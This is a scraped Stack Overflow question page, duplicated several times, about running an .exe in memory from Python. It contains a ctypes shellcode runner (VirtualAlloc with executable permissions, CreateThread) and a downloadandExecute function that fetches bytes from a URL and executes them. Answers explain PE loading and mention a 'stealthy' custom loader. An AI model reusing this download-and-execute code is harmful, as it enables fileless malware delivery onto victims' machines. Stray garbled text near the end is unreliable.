Python Run EXE in memory

Multi tool use
Multi tool use





.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ height:90px;width:728px;box-sizing:border-box;
}







1















I'm trying to execute a .exe in memory in python
but is not working...
any help?



the error: Process finished with exit code -1073741819 (0xC0000005)..
only one .exe in python works.. (converted from python to exe)



the code is passed by this function via parameter... its a byte array



 def executar(code):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(code)).from_buffer(code)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(code)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))


Im trying several .exe files....
Im fallowing this post here:
https://medium.com/@AntiSec_Inc/combining-the-power-of-python-and-assembly-a4cf424be01d



 def downloadandExecute(url): 
response = requests.get(url)
code = bytearray(response.content)
executar(code)


but the error persists










share|improve this question




















  • 4





    I don't understand the question. How would it not be executed in memory?

    – roganjosh
    Jan 3 at 22:13











  • It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in GetLastError?

    – viraptor
    Jan 3 at 22:23











  • Define "is not working". Please say what you expect to happen and what is actually happening.

    – cdarke
    Jan 3 at 22:30











  • Can you give an example of the contents of code?

    – cdarke
    Jan 3 at 22:37











  • Hello, i did try several .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

    – JhonDoe
    Jan 3 at 23:11




















1















I'm trying to execute a .exe in memory in python
but is not working...
any help?



the error: Process finished with exit code -1073741819 (0xC0000005)..
only one .exe in python works.. (converted from python to exe)



the code is passed by this function via parameter... its a byte array



 def executar(code):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(code)).from_buffer(code)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(code)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))


Im trying several .exe files....
Im fallowing this post here:
https://medium.com/@AntiSec_Inc/combining-the-power-of-python-and-assembly-a4cf424be01d



 def downloadandExecute(url): 
response = requests.get(url)
code = bytearray(response.content)
executar(code)


but the error persists










share|improve this question




















  • 4





    I don't understand the question. How would it not be executed in memory?

    – roganjosh
    Jan 3 at 22:13











  • It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in GetLastError?

    – viraptor
    Jan 3 at 22:23











  • Define "is not working". Please say what you expect to happen and what is actually happening.

    – cdarke
    Jan 3 at 22:30











  • Can you give an example of the contents of code?

    – cdarke
    Jan 3 at 22:37











  • Hello, i did try several .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

    – JhonDoe
    Jan 3 at 23:11
















1












1








1








I'm trying to execute a .exe in memory in python
but is not working...
any help?



the error: Process finished with exit code -1073741819 (0xC0000005)..
only one .exe in python works.. (converted from python to exe)



the code is passed by this function via parameter... its a byte array



 def executar(code):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(code)).from_buffer(code)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(code)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))


Im trying several .exe files....
Im fallowing this post here:
https://medium.com/@AntiSec_Inc/combining-the-power-of-python-and-assembly-a4cf424be01d



 def downloadandExecute(url): 
response = requests.get(url)
code = bytearray(response.content)
executar(code)


but the error persists










share|improve this question
















I'm trying to execute a .exe in memory in python
but is not working...
any help?



the error: Process finished with exit code -1073741819 (0xC0000005)..
only one .exe in python works.. (converted from python to exe)



the code is passed by this function via parameter... its a byte array



 def executar(code):
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(code)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(code)).from_buffer(code)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(code)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))


Im trying several .exe files....
Im fallowing this post here:
https://medium.com/@AntiSec_Inc/combining-the-power-of-python-and-assembly-a4cf424be01d



 def downloadandExecute(url): 
response = requests.get(url)
code = bytearray(response.content)
executar(code)


but the error persists







python memory-management exe






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Jan 3 at 23:52







JhonDoe

















asked Jan 3 at 22:12









JhonDoeJhonDoe

62




62








  • 4





    I don't understand the question. How would it not be executed in memory?

    – roganjosh
    Jan 3 at 22:13











  • It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in GetLastError?

    – viraptor
    Jan 3 at 22:23











  • Define "is not working". Please say what you expect to happen and what is actually happening.

    – cdarke
    Jan 3 at 22:30











  • Can you give an example of the contents of code?

    – cdarke
    Jan 3 at 22:37











  • Hello, i did try several .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

    – JhonDoe
    Jan 3 at 23:11
















  • 4





    I don't understand the question. How would it not be executed in memory?

    – roganjosh
    Jan 3 at 22:13











  • It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in GetLastError?

    – viraptor
    Jan 3 at 22:23











  • Define "is not working". Please say what you expect to happen and what is actually happening.

    – cdarke
    Jan 3 at 22:30











  • Can you give an example of the contents of code?

    – cdarke
    Jan 3 at 22:37











  • Hello, i did try several .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

    – JhonDoe
    Jan 3 at 23:11










4




4





I don't understand the question. How would it not be executed in memory?

– roganjosh
Jan 3 at 22:13





I don't understand the question. How would it not be executed in memory?

– roganjosh
Jan 3 at 22:13













It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in GetLastError?

– viraptor
Jan 3 at 22:23





It may be useful to describe how is this code failing. Are you getting an exception from any line? Is it crashing once the thread is spawned? If one of the windows calls fails, what's in GetLastError?

– viraptor
Jan 3 at 22:23













Define "is not working". Please say what you expect to happen and what is actually happening.

– cdarke
Jan 3 at 22:30





Define "is not working". Please say what you expect to happen and what is actually happening.

– cdarke
Jan 3 at 22:30













Can you give an example of the contents of code?

– cdarke
Jan 3 at 22:37





Can you give an example of the contents of code?

– cdarke
Jan 3 at 22:37













Hello, i did try several .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

– JhonDoe
Jan 3 at 23:11







Hello, i did try several .exe files.. only one in python works.. (converted from python to exe).. normal exe return this error: Process finished with exit code -1073741819 (0xC0000005) @viraptor

– JhonDoe
Jan 3 at 23:11














1 Answer
1






active

oldest

votes


















2














I think the code is correct (not tested), but the issue is that you're trying to pass an exe file starting with a lot of metadata to a function which expects pure code. The examples you linked are using straight binary code which is executed without any transformations. They're just streams of instructions.



To load a real exe (PE) file, you'd need to do a bit more work - parse the headers, load required libraries, prepare heap/stack, prepare other sections and mappings, etc.



You can read more about the PE format at https://msdn.microsoft.com/en-au/library/ms809762.aspx






share|improve this answer



















  • 1





    yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

    – JhonDoe
    Jan 3 at 23:47






  • 1





    you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

    – Vlad
    Jan 3 at 23:57






  • 1





    Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

    – Vlad
    Jan 3 at 23:58











  • ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

    – JhonDoe
    Jan 4 at 0:19








  • 1





    It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

    – viraptor
    Jan 4 at 9:46












Your Answer






StackExchange.ifUsing("editor", function () {
StackExchange.using("externalEditor", function () {
StackExchange.using("snippets", function () {
StackExchange.snippets.init();
});
});
}, "code-snippets");

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "1"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});














draft saved

draft discarded


















StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f54030500%2fpython-run-exe-in-memory%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









2














I think the code is correct (not tested), but the issue is that you're trying to pass an exe file starting with a lot of metadata to a function which expects pure code. The examples you linked are using straight binary code which is executed without any transformations. They're just streams of instructions.



To load a real exe (PE) file, you'd need to do a bit more work - parse the headers, load required libraries, prepare heap/stack, prepare other sections and mappings, etc.



You can read more about the PE format at https://msdn.microsoft.com/en-au/library/ms809762.aspx






share|improve this answer



















  • 1





    yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

    – JhonDoe
    Jan 3 at 23:47






  • 1





    you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

    – Vlad
    Jan 3 at 23:57






  • 1





    Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

    – Vlad
    Jan 3 at 23:58











  • ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

    – JhonDoe
    Jan 4 at 0:19








  • 1





    It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

    – viraptor
    Jan 4 at 9:46
















2














I think the code is correct (not tested), but the issue is that you're trying to pass an exe file starting with a lot of metadata to a function which expects pure code. The examples you linked are using straight binary code which is executed without any transformations. They're just streams of instructions.



To load a real exe (PE) file, you'd need to do a bit more work - parse the headers, load required libraries, prepare heap/stack, prepare other sections and mappings, etc.



You can read more about the PE format at https://msdn.microsoft.com/en-au/library/ms809762.aspx






share|improve this answer



















  • 1





    yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

    – JhonDoe
    Jan 3 at 23:47






  • 1





    you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

    – Vlad
    Jan 3 at 23:57






  • 1





    Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

    – Vlad
    Jan 3 at 23:58











  • ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

    – JhonDoe
    Jan 4 at 0:19








  • 1





    It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

    – viraptor
    Jan 4 at 9:46














2












2








2







I think the code is correct (not tested), but the issue is that you're trying to pass an exe file starting with a lot of metadata to a function which expects pure code. The examples you linked are using straight binary code which is executed without any transformations. They're just streams of instructions.



To load a real exe (PE) file, you'd need to do a bit more work - parse the headers, load required libraries, prepare heap/stack, prepare other sections and mappings, etc.



You can read more about the PE format at https://msdn.microsoft.com/en-au/library/ms809762.aspx






share|improve this answer













I think the code is correct (not tested), but the issue is that you're trying to pass an exe file starting with a lot of metadata to a function which expects pure code. The examples you linked are using straight binary code which is executed without any transformations. They're just streams of instructions.



To load a real exe (PE) file, you'd need to do a bit more work - parse the headers, load required libraries, prepare heap/stack, prepare other sections and mappings, etc.



You can read more about the PE format at https://msdn.microsoft.com/en-au/library/ms809762.aspx







share|improve this answer












share|improve this answer



share|improve this answer










answered Jan 3 at 23:38









viraptorviraptor

24.6k677150




24.6k677150








  • 1





    yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

    – JhonDoe
    Jan 3 at 23:47






  • 1





    you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

    – Vlad
    Jan 3 at 23:57






  • 1





    Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

    – Vlad
    Jan 3 at 23:58











  • ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

    – JhonDoe
    Jan 4 at 0:19








  • 1





    It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

    – viraptor
    Jan 4 at 9:46














  • 1





    yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

    – JhonDoe
    Jan 3 at 23:47






  • 1





    you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

    – Vlad
    Jan 3 at 23:57






  • 1





    Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

    – Vlad
    Jan 3 at 23:58











  • ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

    – JhonDoe
    Jan 4 at 0:19








  • 1





    It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

    – viraptor
    Jan 4 at 9:46








1




1





yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

– JhonDoe
Jan 3 at 23:47





yes, you are probably right.. but this seems a lot of work.. do you know any other approach for my problem?

– JhonDoe
Jan 3 at 23:47




1




1





you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

– Vlad
Jan 3 at 23:57





you probably got told wrong information that EXE files are executable binary code. They are not, they are half baked binary files. When you start an executable the OS does a lot of work for you (1) parses headers (2) loads additional DLLs (3) patches reference tables, etc. So you either need to convert your executable to straight up binary code (preload) or you need to do such parsing yourself

– Vlad
Jan 3 at 23:57




1




1





Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

– Vlad
Jan 3 at 23:58





Also, most modern OS systems do not really load executables into memory, they map code sections from disk as virtual memory extents. So when CPU jumps to a piece of code that is not a memory OS receives a page fault and puts the piece of file into memory behind the scenes. This way OS can avoid loading tons of binary code that never be executed.

– Vlad
Jan 3 at 23:58













ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

– JhonDoe
Jan 4 at 0:19







ok, but i have one .exe that works.. any tips on how to to convert a executable to binary code?

– JhonDoe
Jan 4 at 0:19






1




1





It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

– viraptor
Jan 4 at 9:46





It depends what you want to achieve and what are your limitations. You can use CreateProcess to execute files. You could potentially try one of the in-memory filesystems if you just want to avoid touching the drive: en.wikipedia.org/wiki/… If you're trying to be stealthy instead, you have to do it the hard way and make your own loadable PE loader.

– viraptor
Jan 4 at 9:46




















draft saved

draft discarded




















































Thanks for contributing an answer to Stack Overflow!


  • Please be sure to answer the question. Provide details and share your research!

But avoid



  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.


To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f54030500%2fpython-run-exe-in-memory%23new-answer', 'question_page');
}
);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







tsXjP1Xt,7ck
UD4AvXWys5,yONVkIg,B4 j9Nv,T Yq TjMjv9khJVHOGDJfvnK,Ydc0HkECYn3,nbqn56tQtfvsRE IzkRCo

Popular posts from this blog

Monofisismo

Angular Downloading a file using contenturl with Basic Authentication

Olmecas